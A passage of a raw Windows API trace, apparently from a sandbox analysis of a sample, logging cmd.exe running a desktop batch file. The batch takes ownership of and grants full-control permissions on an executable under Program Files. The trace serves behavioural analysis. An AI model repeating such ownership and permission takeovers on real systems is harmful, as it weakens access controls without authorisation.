lpCPInfo=0x49dc4260) returned 1 [0153.257] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ceffc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0153.258] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0153.258] _get_osfhandle (_FileHandle=3) returned 0x74 [0153.258] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0153.258] GetProcessHeap () returned 0x2f0000 [0153.258] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304b00 | out: hHeap=0x2f0000) returned 1 [0153.258] GetProcessHeap () returned 0x2f0000 [0153.258] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3049d0 | out: hHeap=0x2f0000) returned 1 [0153.258] GetProcessHeap () returned 0x2f0000 [0153.258] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3048a8 | out: hHeap=0x2f0000) returned 1 [0153.258] GetProcessHeap () returned 0x2f0000 [0153.258] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304840 | out: hHeap=0x2f0000) returned 1 [0153.258] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304780 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304568 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3044e8 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3043b8 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304290 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304228 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304170 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0ab8 | out: hHeap=0x2f0000) returned 1 [0153.259] GetProcessHeap () returned 0x2f0000 [0153.259] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1230 | out: hHeap=0x2f0000) returned 1 [0153.260] _get_osfhandle (_FileHandle=3) returned 0x74 [0153.260] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0153.260] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefe0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefe0*=0xc2, lpOverlapped=0x0) returned 1 [0153.261] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0153.261] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0153.261] _get_osfhandle (_FileHandle=3) returned 0x74 [0153.261] GetFileType (hFile=0x74) returned 0x1 [0153.261] _get_osfhandle (_FileHandle=3) returned 0x74 [0153.261] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0153.262] GetProcessHeap () returned 0x2f0000 [0153.262] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x314b08 [0153.262] GetProcessHeap () returned 0x2f0000 [0153.262] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0153.266] _tell (_FileHandle=3) returned 47 [0153.267] _close (_FileHandle=3) returned 0 [0153.267] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cedb4 | out: _Buffer="\r\n") returned 2 [0153.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.267] GetFileType (hFile=0x7) returned 0x2 [0153.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.267] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced74 | out: lpMode=0x2ced74) returned 1 [0153.268] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.268] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceda0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceda0*=0x2) returned 1 [0153.270] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0153.270] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0153.270] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cedb0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0153.270] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cedb0 | out: _Buffer=">") returned 1 [0153.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.271] GetFileType (hFile=0x7) returned 0x2 [0153.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.271] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced78 | out: lpMode=0x2ced78) returned 1 [0153.272] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.272] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ceda4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2ceda4*=0x26) returned 1 [0153.272] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.272] GetFileType (hFile=0x7) returned 0x2 [0153.273] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.273] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceffc | out: lpMode=0x2ceffc) returned 1 [0153.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.273] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2f0ac0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf028, lpReserved=0x0 | out: lpBuffer=0x2f0ac0*, lpNumberOfCharsWritten=0x2cf028*=0x7) returned 1 [0153.274] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf034 | out: _Buffer=" /F \"C:\\Program Files\\MSBuild\\executed_florists.exe\" ") returned 53 [0153.274] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.274] GetFileType (hFile=0x7) returned 0x2 [0153.274] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.274] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0153.275] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.275] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x35) returned 1 [0153.277] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0153.277] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.277] GetFileType (hFile=0x7) returned 0x2 [0153.278] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.278] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0153.278] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.278] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0153.280] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0153.280] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0153.280] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0153.280] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0153.280] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0153.280] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0153.281] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0153.281] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0153.281] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0153.281] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0153.281] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0153.281] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0153.281] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0153.281] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0153.281] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0153.281] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0153.281] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0153.281] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0153.281] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0153.281] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0153.281] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0153.281] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0153.281] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0153.281] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0153.282] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0153.282] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0153.282] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0153.282] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0153.282] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0153.282] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0153.282] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0153.282] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0153.282] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0153.282] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0153.282] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0153.282] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0153.282] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0153.282] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0153.282] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0153.282] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0153.282] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0153.282] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0153.284] GetConsoleTitleW (in: lpConsoleTitle=0x2cebc4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.285] GetConsoleTitleW (in: lpConsoleTitle=0x2ce958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.285] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ce7e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ce8a8 | out: lpAttributeList=0x2ce7e0, lpSize=0x2ce8a8) returned 1 [0153.285] UpdateProcThreadAttribute (in: lpAttributeList=0x2ce7e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ce8a0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ce7e0, lpPreviousValue=0x0) returned 1 [0153.285] GetStartupInfoW (in: lpStartupInfo=0x2ce79c | out: lpStartupInfo=0x2ce79c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0153.310] CloseHandle (hObject=0x74) returned 1 [0153.310] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0153.310] GetProcessHeap () returned 0x2f0000 [0153.311] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308178 | out: hHeap=0x2f0000) returned 1 [0153.311] GetEnvironmentStringsW () returned 0x305f90* [0153.311] GetProcessHeap () returned 0x2f0000 [0153.311] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb5c) returned 0x308178 [0153.311] FreeEnvironmentStringsW (penv=0x305f90) returned 1 [0153.311] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0157.902] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ce77c | out: lpExitCode=0x2ce77c*=0x0) returned 1 [0157.902] CloseHandle (hObject=0x78) returned 1 [0157.902] _vsnwprintf (in: _Buffer=0x2ce8c4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ce788 | out: _Buffer="00000000") returned 8 [0157.903] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0157.903] GetProcessHeap () returned 0x2f0000 [0157.903] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308178 | out: hHeap=0x2f0000) returned 1 [0157.903] GetEnvironmentStringsW () returned 0x305f90* [0157.904] GetProcessHeap () returned 0x2f0000 [0157.904] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb5c) returned 0x308178 [0157.904] FreeEnvironmentStringsW (penv=0x305f90) returned 1 [0157.904] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0157.904] GetProcessHeap () returned 0x2f0000 [0157.904] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308178 | out: hHeap=0x2f0000) returned 1 [0157.904] GetEnvironmentStringsW () returned 0x305f90* [0157.904] GetProcessHeap () returned 0x2f0000 [0157.904] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb5c) returned 0x308178 [0157.904] FreeEnvironmentStringsW (penv=0x305f90) returned 1 [0157.904] GetProcessHeap () returned 0x2f0000 [0157.904] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0db8 | out: hHeap=0x2f0000) returned 1 [0157.904] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ce7e0 | out: lpAttributeList=0x2ce7e0) [0157.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.905] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.905] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.905] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0157.906] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.906] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0157.906] SetConsoleInputExeNameW () returned 0x1 [0157.906] GetConsoleOutputCP () returned 0x1b5 [0157.906] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0157.907] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ceffc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0157.907] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0157.908] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.908] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304a28 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3048f8 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3047d0 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304760 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3046d0 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3044b8 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304438 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304308 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3041e0 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304170 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.908] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x312c20 | out: hHeap=0x2f0000) returned 1 [0157.908] GetProcessHeap () returned 0x2f0000 [0157.909] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f0ab8 | out: hHeap=0x2f0000) returned 1 [0157.909] GetProcessHeap () returned 0x2f0000 [0157.909] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f1230 | out: hHeap=0x2f0000) returned 1 [0157.909] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.909] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0157.909] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cefe0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cefe0*=0xb3, lpOverlapped=0x0) returned 1 [0157.909] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0157.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0157.910] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.910] GetFileType (hFile=0x78) returned 0x1 [0157.910] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.910] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0157.910] GetProcessHeap () returned 0x2f0000 [0157.910] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x400a) returned 0x314b08 [0157.911] GetProcessHeap () returned 0x2f0000 [0157.911] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x68) returned 0x2f1230 [0157.911] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe", nBufferLength=0x208, lpBuffer=0x2ce770, lpFilePart=0x2ce768 | out: lpBuffer="C:\\Program Files\\MSBuild\\executed_florists.exe", lpFilePart=0x2ce768*="executed_florists.exe") returned 0x2e [0157.911] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x304170 [0157.912] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.912] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0157.912] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdd66d4c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd66d4c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 0x304170 [0157.912] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.912] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe", lpFindFileData=0x2ce484 | out: lpFindFileData=0x2ce484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3192db60, ftCreationTime.dwHighDateTime=0x1d56410, ftLastAccessTime.dwLowDateTime=0xeadeb250, ftLastAccessTime.dwHighDateTime=0x1d5dca7, ftLastWriteTime.dwLowDateTime=0xeadeb250, ftLastWriteTime.dwHighDateTime=0x1d5dca7, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="executed_florists.exe", cAlternateFileName="EXECUT~1.EXE")) returned 0x304170 [0157.913] FindClose (in: hFindFile=0x304170 | out: hFindFile=0x304170) returned 1 [0157.913] _wcsnicmp (_String1="EXECUT~1.EXE", _String2="executed_florists.exe", _MaxCount=0x15) returned 25 [0157.913] GetProcessHeap () returned 0x2f0000 [0157.913] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x34) returned 0x304170 [0157.913] GetProcessHeap () returned 0x2f0000 [0157.913] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314b08 | out: hHeap=0x2f0000) returned 1 [0157.915] _tell (_FileHandle=3) returned 63 [0157.915] _close (_FileHandle=3) returned 0 [0157.916] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cedb4 | out: _Buffer="\r\n") returned 2 [0157.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.916] GetFileType (hFile=0x7) returned 0x2 [0157.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced74 | out: lpMode=0x2ced74) returned 1 [0157.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.917] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceda0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceda0*=0x2) returned 1 [0157.919] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0157.919] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0157.919] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cedb0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0157.919] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cedb0 | out: _Buffer=">") returned 1 [0157.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.920] GetFileType (hFile=0x7) returned 0x2 [0157.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ced78 | out: lpMode=0x2ced78) returned 1 [0157.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.921] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ceda4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2ceda4*=0x26) returned 1 [0157.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.921] GetFileType (hFile=0x7) returned 0x2 [0157.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.922] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceffc | out: lpMode=0x2ceffc) returned 1 [0157.922] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.922] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2f0dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2cf028, lpReserved=0x0 | out: lpBuffer=0x2f0dc0*, lpNumberOfCharsWritten=0x2cf028*=0x3) returned 1 [0157.923] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf034 | out: _Buffer=" FN=\"executed_florists.exe\" ") returned 28 [0157.923] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.923] GetFileType (hFile=0x7) returned 0x2 [0157.924] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.924] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceff4 | out: lpMode=0x2ceff4) returned 1 [0157.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.924] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x2cf020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf020*=0x1c) returned 1 [0157.925] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0157.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.925] GetFileType (hFile=0x7) returned 0x2 [0157.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0157.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.925] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, 